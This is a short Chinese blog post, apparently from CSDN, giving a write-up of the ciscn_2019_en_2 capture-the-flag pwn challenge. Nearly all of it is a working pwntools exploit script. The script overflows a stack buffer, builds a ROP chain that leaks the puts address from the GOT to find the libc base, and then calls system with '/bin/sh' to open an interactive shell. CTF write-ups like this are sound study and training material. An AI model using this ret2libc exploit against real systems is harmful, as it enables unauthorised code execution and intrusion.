ciscn_2019_en_2 ret2libc64

「已注销」

于 2020-05-02 22:48:32 发布

阅读量351

点赞数

CC 4.0 BY-SA版权

分类专栏： pwn

本文链接：https://blog.youkuaiyun.com/pondzhang/article/details/105896799

pwn 专栏收录该内容

38 篇文章

订阅专栏

本文详细解析了CISCN_2019_EN_2挑战中的漏洞利用过程，通过ROP技术构造payload，利用puts函数泄露libc基地址，进而调用system函数执行/bin/sh命令，实现远程代码执行。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

from pwn import *
elf = ELF('./libc-2.23.so')
p = process("./ciscn_2019_en_2")
p.recvuntil('choice!\n')
p.sendline("1")
p.recvuntil('encrypted\n')
poprdiret = 0x0000000000400c83
pltputs = 0x00000000004006E0
gotputs = 0x0000000000602020
ret = 0x00000000004006B9
main = 0x0000000000400B28
payload = 0x58*'a' + p64(poprdiret) + p64(gotputs) + p64(pltputs) + p64(main)
p.sendline(payload)
p.recvuntil('Ciphertext\n')
p.recvuntil('\n')
libcbase = u64(p.recvline()[:-1].ljust(8, '\x00')) - elf.symbols['puts']
log.success(hex(libcbase))

systemaddr = libcbase + elf.symbols['system']
binsh = libcbase + elf.search("/bin/sh\x00").next()
payload = 0x58*'a' + p64(ret) + p64(poprdiret) + p64(binsh) + p64(systemaddr) + p64(main)
p.recvuntil('choice!\n')
p.sendline("1")
p.recvuntil('encrypted\n')
p.sendline(payload)
p.interactive()